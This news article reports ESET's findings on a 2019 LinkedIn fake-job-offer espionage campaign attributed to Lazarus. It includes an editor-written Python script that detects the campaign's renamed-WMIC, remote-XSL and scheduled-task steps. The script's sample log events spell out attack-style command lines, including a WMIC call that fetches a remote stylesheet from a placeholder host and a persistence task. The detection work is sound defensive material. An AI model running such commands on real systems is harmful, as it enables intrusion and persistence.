Cyber Attackers Use Lucrative Job Offers via LinkedIn to Snare Victims

Giulio Saggin
Tuesday, 28 November 2023

Cyber attackers have used the lure of lucrative job offers via LinkedIn to target employees of aerospace and military companies in Europe and the Middle East.

The attacks, which took place from September to December 2019, used a malware sample named 'Inception.dll' and are believed to be the work of North Korea's Lazarus Group.

"They were highly targeted and relied on social engineering over LinkedIn and custom, multistage malware," said researchers from ESET, who made the discovery. "To operate under the radar, the attackers frequently recompiled their malware, abused native Windows utilities and impersonated legitimate software and companies. To our knowledge, the malware hasn’t been previously documented."

The researchers believe the primary goal of the operation was espionage. However, in one case, attackers used a business email compromise attack as the final stage of the operation.

"First, leveraging existing communication in the victim’s emails, the attackers tried to manipulate a customer of the targeted company to pay a pending invoice to their bank account," said the researchers. "Rather than paying the invoice, the customer enquired about the requested sum ... (and) ended up contacting the victim’s correct email address about the issue, raising an alarm on the victim’s side."

THE ATTACKS

Contact was initially made via fictitious job offers using LinkedIn’s messaging feature. The attackers posed as HR people from well-known and credible aerospace and defense industry companies, such as General Dynamics and Collins Aerospace (formerly Rockwell Collins).

Once a successful contact was made, malicious files - disguised as documents pertinent to the job offer - were placed into the online conversation.

The malicious files were sent either via LinkedIn or via (fake) email and OneDrive. Once opened, the LNK (Windows shortcut) file started a Command Prompt that opened a remote PDF file in the target’s default browser.

"That PDF, seemingly containing salary information for the reputed job positions, in reality served as a decoy," said the researchers. "In the background, the Command Prompt created a new folder and copied the WMI Commandline Utility to this folder, renaming the utility in the process. Finally, it created a scheduled task, set to execute a remote XSL script periodically via the copied (WMI Commandline Utility)."

Once inside the victim's environment, the attackers were able to use an arsenal of tools, including custom, multistage malware and modified versions of open-source tools.

The attackers attempted to remain undetected by disguising files and folders with the names of well-established software and companies (Intel and Skype, to name two), digitally signing some components of their malware, recompiling the Stage 1 malware numerous times throughout the operation and implementing anti-analysis techniques in their custom malware.
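The persistence and evasion steps described above (a renamed copy of the WMI Commandline Utility dropped into a folder named after well-known software, a scheduled task that runs it, and a remote XSL script fetched over HTTP) leave a recognisable trail in process-creation telemetry. The following detection logic is an added, editor-written example; it is not code from the article or from ESET. The events it scans are constructed samples whose field names follow Sysmon Event ID 1 (Image, OriginalFileName, CommandLine); every path, task name and hostname in them is a placeholder. The rules generalise slightly beyond the article: wmic.exe is the only renamed utility the article names, so the other entries in RENAME_SENSITIVE are an editorial assumption about binaries commonly abused the same way.

```python
"""Flag the telltale steps of the job-offer attack chain in process-creation logs:
a renamed living-off-the-land binary, a remote XSL stylesheet handed to WMIC,
and a scheduled task whose action lives in a user-writable folder."""
import ntpath
import re
from typing import Callable, Dict, List, Tuple

Event = Dict[str, str]

# wmic.exe is the utility the article names; the rest are an editorial assumption
# about other Windows binaries whose rename would be equally suspicious.
RENAME_SENSITIVE = {"wmic.exe", "rundll32.exe", "regsvr32.exe", "mshta.exe"}

# Folders a normal user can write to: a scheduled task pointing here deserves a look.
USER_WRITABLE = re.compile(r"\\(AppData|Temp|ProgramData|Users\\Public)\\", re.IGNORECASE)

# WMIC's /format: switch accepting an http(s) URL pulls a stylesheet from the network.
REMOTE_XSL = re.compile(r'/format:\s*"?https?://', re.IGNORECASE)

# CONSTRUCTED sample events (not from the ESET report); values are placeholders.
SAMPLE_EVENTS: List[Event] = [
    {"Image": r"C:\Windows\System32\wbem\WMIC.exe",          # benign admin use
     "OriginalFileName": "wmic.exe",
     "CommandLine": "wmic os get caption"},
    {"Image": r"C:\Users\alice\AppData\Local\Intel\svc.exe",  # wmic.exe renamed into an "Intel" folder
     "OriginalFileName": "wmic.exe",
     "CommandLine": 'svc.exe os get /format:"https://example.invalid/update.xsl"'},
    {"Image": r"C:\Windows\System32\schtasks.exe",           # persistence via scheduled task
     "OriginalFileName": "schtasks.exe",
     "CommandLine": r"schtasks /create /sc minute /mo 30 /tn IntelUpdate "
                    r"/tr C:\Users\alice\AppData\Local\Intel\svc.exe"},
    {"Image": r"C:\Windows\System32\cmd.exe",                # opens the decoy PDF; not flagged alone
     "OriginalFileName": "Cmd.Exe",
     "CommandLine": "cmd /c start https://example.invalid/salary.pdf"},
]


def original_name(ev: Event) -> str:
    """PE version-info name, which survives a rename of the file on disk."""
    return ev.get("OriginalFileName", "").lower()


def image_name(ev: Event) -> str:
    """Basename of the executable actually launched (ntpath handles Windows paths anywhere)."""
    return ntpath.basename(ev.get("Image", "")).lower()


def renamed_lolbin(ev: Event) -> bool:
    """True when a rename-sensitive binary runs under a name other than its own."""
    orig = original_name(ev)
    return orig in RENAME_SENSITIVE and image_name(ev) != orig


def remote_xsl_via_wmic(ev: Event) -> bool:
    """True when WMIC (renamed or not) is handed a stylesheet fetched over HTTP(S)."""
    return original_name(ev) == "wmic.exe" and bool(REMOTE_XSL.search(ev.get("CommandLine", "")))


def scheduled_task_user_dir(ev: Event) -> bool:
    """True when schtasks creates a task whose action sits in a user-writable folder."""
    if original_name(ev) != "schtasks.exe":
        return False
    cmd = ev.get("CommandLine", "")
    if "/create" not in cmd.lower():
        return False
    action = re.search(r'/tr\s+"?([^"]+)', cmd, re.IGNORECASE)
    return bool(action and USER_WRITABLE.search(action.group(1)))


RULES: List[Tuple[str, Callable[[Event], bool]]] = [
    ("renamed_lolbin", renamed_lolbin),
    ("remote_xsl_via_wmic", remote_xsl_via_wmic),
    ("scheduled_task_user_dir", scheduled_task_user_dir),
]


def scan(events: List[Event]) -> List[Tuple[int, str]]:
    """Return (event index, rule name) for every rule that fires on every event."""
    findings = []
    for idx, ev in enumerate(events):
        for name, rule in RULES:
            if rule(ev):
                findings.append((idx, name))
    return findings


if __name__ == "__main__":
    for idx, name in scan(SAMPLE_EVENTS):
        print(f"event {idx}: {name} -> {SAMPLE_EVENTS[idx]['CommandLine']}")
```

The key design choice is to key every rule on OriginalFileName rather than on the image path: the article's attackers renamed the utility and hid it in a folder named after Intel, which defeats any rule that looks for `wmic.exe` on disk, but the version-info name embedded in the executable is unchanged. Correlating the three findings on the same host within a short window is what turns individual hits into a high-confidence alert; the benign `wmic os get caption` event shows why a single rule on WMIC alone would be too noisy.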

Nothing firm linked the attacks to a known threat actor.

"However," said ESET, "the method of targeting, use of fake LinkedIn accounts, development environment, and anti-analysis techniques bore strong resemblance to those used by the Lazarus group."

ESET White Paper
